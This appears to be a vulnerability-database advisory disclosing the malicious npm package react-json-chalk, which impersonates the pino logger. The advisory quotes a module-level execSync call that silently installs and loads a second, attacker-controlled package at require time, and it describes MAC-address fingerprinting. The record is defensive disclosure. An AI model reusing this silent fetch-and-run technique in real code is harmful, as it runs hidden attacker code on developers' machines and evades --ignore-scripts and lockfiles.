Vulnerability
Malicious code in react-json-chalk (npm)
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77)

The package is published as `react-json-chalk`, but its `main` entry (`pino.js`) impersonates the pino logger: the homepage is `https://getpino.io`, the pino source tree is bundled, and the description is misappropriated from pino.

On `require('react-json-chalk')`, `pino.js` immediately loads `lib/writer.js`. At module top level, `lib/writer.js` tries `require('react-pinojs')` and, if that fails, executes `child_process.execSync("npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent")` and then `require('../../react-pinojs/pino.js')`. The flags suppress install output and keep the dependency out of package.json and the lockfile, so consumers get no visible signal that a second package was fetched.

The fetched dependency is unpinned and fully controlled by whoever publishes `react-pinojs`, and its code runs as part of the `require()` of this package: arbitrary attacker code on the installing machine on every import. Because the payload runs at `require()` time rather than in an install script, `npm install --ignore-scripts` does not prevent it; a lockfile does not either, since the second package is never recorded in it.

The same `lib/writer.js` defines `getMacAddress()`, which enumerates the MAC addresses of non-internal IPv4 interfaces, consistent with host fingerprinting handed off to the second stage.

The package name/contents mismatch (a logger source tree published under an unrelated name) is also a namespace-abuse / pino-impersonation pattern.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / exploitation signals and the EPSS percentile. Re-check this record later; the score is picked up automatically once the source publishes it.
FIRST.org publishes EPSS daily. Coverage isn't universal: EPSS scores published CVE IDs only, so reserved or not-yet-published IDs carry no score until the CVE record goes public, and a malicious-package advisory with no CVE ID never receives one. Where a score applies, it will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence